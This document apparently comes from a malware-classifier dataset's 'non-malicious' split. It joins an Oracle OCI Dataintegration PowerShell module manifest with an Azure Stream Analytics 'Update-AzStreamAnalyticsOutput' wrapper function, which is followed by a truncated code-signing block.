# # Module manifest for module 'OCI.PSModules.Dataintegration' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Dataintegration.dll' # Version number of this module. ModuleVersion = '83.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '769e2e00-1fe3-46af-a9e9-c24a01403239' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Dataintegration Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Dataintegration.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Get-OCIDataintegrationApplication', 'Get-OCIDataintegrationApplicationDetailedDescription', 'Get-OCIDataintegrationApplicationsList', 'Get-OCIDataintegrationCompositeState', 'Get-OCIDataintegrationConnection', 'Get-OCIDataintegrationConnectionsList', 'Get-OCIDataintegrationConnectionValidation', 'Get-OCIDataintegrationConnectionValidationsList', 'Get-OCIDataintegrationCopyObjectRequest', 'Get-OCIDataintegrationCopyObjectRequestsList', 'Get-OCIDataintegrationCountStatistic', 'Get-OCIDataintegrationDataAsset', 'Get-OCIDataintegrationDataAssetsList', 'Get-OCIDataintegrationDataEntitiesList', 'Get-OCIDataintegrationDataEntity', 'Get-OCIDataintegrationDataFlow', 'Get-OCIDataintegrationDataFlowsList', 'Get-OCIDataintegrationDataFlowValidation', 'Get-OCIDataintegrationDataFlowValidationsList', 'Get-OCIDataintegrationDependentObject', 'Get-OCIDataintegrationDependentObjectsList', 'Get-OCIDataintegrationDisApplication', 'Get-OCIDataintegrationDisApplicationDetailedDescription', 'Get-OCIDataintegrationDisApplicationsList', 'Get-OCIDataintegrationDisApplicationTaskRunLineagesList', 'Get-OCIDataintegrationExportRequest', 'Get-OCIDataintegrationExportRequestsList', 'Get-OCIDataintegrationExternalPublication', 'Get-OCIDataintegrationExternalPublicationsList', 'Get-OCIDataintegrationExternalPublicationValidation', 'Get-OCIDataintegrationExternalPublicationValidationsList', 'Get-OCIDataintegrationFolder', 'Get-OCIDataintegrationFoldersList', 'Get-OCIDataintegrationFunctionLibrariesList', 'Get-OCIDataintegrationFunctionLibrary', 'Get-OCIDataintegrationImportRequest', 'Get-OCIDataintegrationImportRequestsList', 'Get-OCIDataintegrationPatch', 'Get-OCIDataintegrationPatchChangesList', 'Get-OCIDataintegrationPatchesList', 'Get-OCIDataintegrationPipeline', 'Get-OCIDataintegrationPipelinesList', 'Get-OCIDataintegrationPipelineValidation', 'Get-OCIDataintegrationPipelineValidationsList', 'Get-OCIDataintegrationProject', 'Get-OCIDataintegrationProjectsList', 'Get-OCIDataintegrationPublishedObject', 'Get-OCIDataintegrationPublishedObjectsList', 'Get-OCIDataintegrationReference', 'Get-OCIDataintegrationReferencesList', 'Get-OCIDataintegrationRuntimeOperator', 'Get-OCIDataintegrationRuntimeOperatorsList', 'Get-OCIDataintegrationRuntimePipeline', 'Get-OCIDataintegrationRuntimePipelinesList', 'Get-OCIDataintegrationSchedule', 'Get-OCIDataintegrationSchedulesList', 'Get-OCIDataintegrationSchema', 'Get-OCIDataintegrationSchemasList', 'Get-OCIDataintegrationTask', 'Get-OCIDataintegrationTaskRun', 'Get-OCIDataintegrationTaskRunLineagesList', 'Get-OCIDataintegrationTaskRunLogsList', 'Get-OCIDataintegrationTaskRunsList', 'Get-OCIDataintegrationTaskSchedule', 'Get-OCIDataintegrationTaskSchedulesList', 'Get-OCIDataintegrationTasksList', 'Get-OCIDataintegrationTaskValidation', 'Get-OCIDataintegrationTaskValidationsList', 'Get-OCIDataintegrationTemplate', 'Get-OCIDataintegrationTemplatesList', 'Get-OCIDataintegrationUserDefinedFunction', 'Get-OCIDataintegrationUserDefinedFunctionsList', 'Get-OCIDataintegrationUserDefinedFunctionValidation', 'Get-OCIDataintegrationUserDefinedFunctionValidationsList', 'Get-OCIDataintegrationWorkRequest', 'Get-OCIDataintegrationWorkRequestErrorsList', 'Get-OCIDataintegrationWorkRequestLogsList', 'Get-OCIDataintegrationWorkRequestsList', 'Get-OCIDataintegrationWorkspace', 'Get-OCIDataintegrationWorkspacesList', 'Move-OCIDataintegrationCompartment', 'Move-OCIDataintegrationDisApplicationCompartment', 'New-OCIDataintegrationApplication', 'New-OCIDataintegrationApplicationDetailedDescription', 'New-OCIDataintegrationConnection', 'New-OCIDataintegrationConnectionValidation', 'New-OCIDataintegrationCopyObjectRequest', 'New-OCIDataintegrationDataAsset', 'New-OCIDataintegrationDataFlow', 'New-OCIDataintegrationDataFlowValidation', 'New-OCIDataintegrationDisApplication', 'New-OCIDataintegrationDisApplicationDetailedDescription', 'New-OCIDataintegrationEntityShape', 'New-OCIDataintegrationExportRequest', 'New-OCIDataintegrationExternalPublication', 'New-OCIDataintegrationExternalPublicationValidation', 'New-OCIDataintegrationFolder', 'New-OCIDataintegrationFunctionLibrary', 'New-OCIDataintegrationImportRequest', 'New-OCIDataintegrationPatch', 'New-OCIDataintegrationPipeline', 'New-OCIDataintegrationPipelineValidation', 'New-OCIDataintegrationProject', 'New-OCIDataintegrationSchedule', 'New-OCIDataintegrationTask', 'New-OCIDataintegrationTaskRun', 'New-OCIDataintegrationTaskSchedule', 'New-OCIDataintegrationTaskValidation', 'New-OCIDataintegrationUserDefinedFunction', 'New-OCIDataintegrationUserDefinedFunctionValidation', 'New-OCIDataintegrationWorkspace', 'Remove-OCIDataintegrationApplication', 'Remove-OCIDataintegrationApplicationDetailedDescription', 'Remove-OCIDataintegrationConnection', 'Remove-OCIDataintegrationConnectionValidation', 'Remove-OCIDataintegrationCopyObjectRequest', 'Remove-OCIDataintegrationDataAsset', 'Remove-OCIDataintegrationDataFlow', 'Remove-OCIDataintegrationDataFlowValidation', 'Remove-OCIDataintegrationDisApplication', 'Remove-OCIDataintegrationDisApplicationDetailedDescription', 'Remove-OCIDataintegrationExportRequest', 'Remove-OCIDataintegrationExternalPublication', 'Remove-OCIDataintegrationExternalPublicationValidation', 'Remove-OCIDataintegrationFolder', 'Remove-OCIDataintegrationFunctionLibrary', 'Remove-OCIDataintegrationImportRequest', 'Remove-OCIDataintegrationPatch', 'Remove-OCIDataintegrationPipeline', 'Remove-OCIDataintegrationPipelineValidation', 'Remove-OCIDataintegrationProject', 'Remove-OCIDataintegrationSchedule', 'Remove-OCIDataintegrationTask', 'Remove-OCIDataintegrationTaskRun', 'Remove-OCIDataintegrationTaskSchedule', 'Remove-OCIDataintegrationTaskValidation', 'Remove-OCIDataintegrationUserDefinedFunction', 'Remove-OCIDataintegrationUserDefinedFunctionValidation', 'Remove-OCIDataintegrationWorkspace', 'Start-OCIDataintegrationWorkspace', 'Stop-OCIDataintegrationWorkspace', 'Update-OCIDataintegrationApplication', 'Update-OCIDataintegrationApplicationDetailedDescription', 'Update-OCIDataintegrationConnection', 'Update-OCIDataintegrationCopyObjectRequest', 'Update-OCIDataintegrationDataAsset', 'Update-OCIDataintegrationDataFlow', 'Update-OCIDataintegrationDisApplication', 'Update-OCIDataintegrationDisApplicationDetailedDescription', 'Update-OCIDataintegrationExportRequest', 'Update-OCIDataintegrationExternalPublication', 'Update-OCIDataintegrationFolder', 'Update-OCIDataintegrationFunctionLibrary', 'Update-OCIDataintegrationImportRequest', 'Update-OCIDataintegrationPipeline', 'Update-OCIDataintegrationProject', 'Update-OCIDataintegrationReference', 'Update-OCIDataintegrationSchedule', 'Update-OCIDataintegrationTask', 'Update-OCIDataintegrationTaskRun', 'Update-OCIDataintegrationTaskSchedule', 'Update-OCIDataintegrationUserDefinedFunction', 'Update-OCIDataintegrationWorkspace' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Dataintegration' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_26_78.ps1
sample_26_78.ps1
# ---------------------------------------------------------------------------------- # # Copyright Microsoft Corporation # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ---------------------------------------------------------------------------------- <# .Synopsis Updates an existing output under an existing streaming job. This can be used to partially update (ie. update one or two properties) an output without affecting the rest the job or output definition. .Description Updates an existing output under an existing streaming job. This can be used to partially update (ie. update one or two properties) an output without affecting the rest the job or output definition. .Example PS C:\> {{ Add code here }} {{ Add output here }} .Example PS C:\> {{ Add code here }} {{ Add output here }} .Inputs Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IOutput .Inputs Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.IStreamAnalyticsIdentity .Outputs Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IOutput .Notes COMPLEX PARAMETER PROPERTIES To create the parameters described below, construct a hash table containing the appropriate properties. For information on hash tables, run Get-Help about_Hash_Tables. DATASOURCE <IOutputDataSource>: Describes the data source that output will be written to. Required on PUT (CreateOrReplace) requests. Type <String>: Indicates the type of data source output will be written to. Required on PUT (CreateOrReplace) requests. INPUTOBJECT <IStreamAnalyticsIdentity>: Identity Parameter [ClusterName <String>]: The name of the cluster. [FunctionName <String>]: The name of the function. [Id <String>]: Resource identity path [InputName <String>]: The name of the input. [JobName <String>]: The name of the streaming job. [Location <String>]: The region in which to retrieve the subscription's quota information. You can find out which regions Azure Stream Analytics is supported in here: https://azure.microsoft.com/en-us/regions/ [OutputName <String>]: The name of the output. [ResourceGroupName <String>]: The name of the resource group. The name is case insensitive. [SubscriptionId <String>]: The ID of the target subscription. [TransformationName <String>]: The name of the transformation. OUTPUT <IOutput>: An output object, containing all information associated with the named output. All outputs are contained under a streaming job. [Datasource <IOutputDataSource>]: Describes the data source that output will be written to. Required on PUT (CreateOrReplace) requests. Type <String>: Indicates the type of data source output will be written to. Required on PUT (CreateOrReplace) requests. [ETag <String>]: [SerializationType <EventSerializationType?>]: Indicates the type of serialization that the input or output uses. Required on PUT (CreateOrReplace) requests. [SizeWindow <Single?>]: [TimeWindow <String>]: .Link https://learn.microsoft.com/powershell/module/az.streamanalytics/update-azstreamanalyticsoutput #> function Update-AzStreamAnalyticsOutput { [OutputType([Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.IOutput])] [CmdletBinding(DefaultParameterSetName='Update', PositionalBinding=$false, SupportsShouldProcess, ConfirmImpact='Medium')] param( [Parameter(ParameterSetName='Update', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the streaming job. ${JobName}, [Parameter(ParameterSetName='Update', Mandatory)] [Alias('OutputName')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the output. ${Name}, [Parameter(ParameterSetName='Update', Mandatory)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the resource group. # The name is case insensitive. ${ResourceGroupName}, [Parameter(ParameterSetName='Update', Mandatory)] [Parameter(ParameterSetName='UpdateViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [System.String] # The name of the streaming job. ${File}, [Parameter(ParameterSetName='Update')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.DefaultInfo(Script='(Get-AzContext).Subscription.Id')] [System.String] # The ID of the target subscription. ${SubscriptionId}, [Parameter(ParameterSetName='UpdateViaIdentity', Mandatory, ValueFromPipeline)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Path')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.IStreamAnalyticsIdentity] # Identity Parameter # To construct, see NOTES section for INPUTOBJECT properties and create a hash table. ${InputObject}, [Parameter()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Header')] [System.String] # The ETag of the output. # Omit this value to always overwrite the current output. # Specify the last-seen ETag value to prevent accidentally overwriting concurrent changes. ${IfMatch}, [Parameter()] [Alias('AzureRMContext', 'AzureCredential')] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Azure')] [System.Management.Automation.PSObject] # The credentials, account, tenant, and subscription used for communication with Azure. ${DefaultProfile}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Wait for .NET debugger to attach ${Break}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be appended to the front of the pipeline ${HttpPipelineAppend}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Runtime.SendAsyncStep[]] # SendAsync Pipeline Steps to be prepended to the front of the pipeline ${HttpPipelinePrepend}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Uri] # The URI for the proxy server to use ${Proxy}, [Parameter(DontShow)] [ValidateNotNull()] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Management.Automation.PSCredential] # Credentials for a proxy server to use for the remote call ${ProxyCredential}, [Parameter(DontShow)] [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Category('Runtime')] [System.Management.Automation.SwitchParameter] # Use the default credentials for the proxy ${ProxyUseDefaultCredentials} ) begin { try { $outputParameters = Get-Content -Path $File | Out-String if ([Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.OutputTypeConverter]::CanConvertFrom($outputParameters)) { $function = [Microsoft.Azure.PowerShell.Cmdlets.StreamAnalytics.Models.Api20170401Preview.OutputTypeConverter]::ConvertFrom($outputParameters) } else { throw "The json format is invalid" } $PSBoundParameters.Add("Output", $function) $null = $PSBoundParameters.Remove("File"); $outBuffer = $null if ($PSBoundParameters.TryGetValue('OutBuffer', [ref]$outBuffer)) { $PSBoundParameters['OutBuffer'] = 1 } $parameterSet = $PSCmdlet.ParameterSetName $mapping = @{ Update = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_Update'; UpdateExpanded = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_UpdateExpanded'; UpdateViaIdentity = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_UpdateViaIdentity'; UpdateViaIdentityExpanded = 'Az.StreamAnalytics.private\Update-AzStreamAnalyticsOutput_UpdateViaIdentityExpanded'; } if (('Update', 'UpdateExpanded') -contains $parameterSet -and -not $PSBoundParameters.ContainsKey('SubscriptionId')) { $PSBoundParameters['SubscriptionId'] = (Get-AzContext).Subscription.Id } $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand(($mapping[$parameterSet]), [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters} $steppablePipeline = $scriptCmd.GetSteppablePipeline($MyInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCBLOTC8Nz12Ju6M # lwVYuyTOBOeo1qA6HUaSgbR7OlRtxqCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIFLJsR7R3AmOR9mE4TE60F2M # Kntcku6p5IWfZx9msgCVMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAq4eGql0af5iHS2BY4AZwED8PA+ziJrPIU4+6qC3+ALqTP55HBewHl3Qz # e9RRpeYdYqHqNlVE1dgVdB7AiUKdauJQyaBGRLHcV5EwZI0KJH2BoGixwbAQJByL # ngaSAJIaegVG1MHS285ZGp29/yk6mOdHBNNg2oJ7mgTbSqM3Eq7+pozFcnoTheVo # h+4skvZOJDqfUUrVznJHSGXJYjZi503SAYiFIaMMm2hXiUUFnaiTzfKQtpbaeTIW # SDo29Y9oN5rC5Bd+sRcP4dv/gelo1IDT0icGYVreY1DbvPNdVmn3/Nk5+J1KY5Se # sFFr0kjAGMS06U9SHEIb8N/4PWw/w6GCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCCXePcWitIRLw1BTDak54TZlzBqfjnfv0lsGMNSRN2adwIGZh/SmF65 # 